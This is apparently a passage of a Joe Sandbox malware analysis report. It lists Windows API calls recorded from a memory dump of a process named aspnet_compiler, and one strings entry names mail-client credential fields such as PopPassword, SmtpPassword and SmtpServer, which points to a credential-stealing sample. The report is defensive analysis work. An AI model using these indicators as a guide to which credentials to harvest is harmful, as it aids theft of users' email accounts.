                                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                Similarity
                                • API ID: FreeVirtual
                                APIs
                                • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                APIs
                                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                APIs
                                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 0040438F
                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                • VariantInit.OLEAUT32(?), ref: 00404414
                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                • VariantInit.OLEAUT32(?), ref: 00404431
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                • String ID:
                                • API String ID: 1312198159-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                • API ID:
                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                • API String ID: 0-2111798378
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                • API ID:
                                • String ID:
                                • API String ID: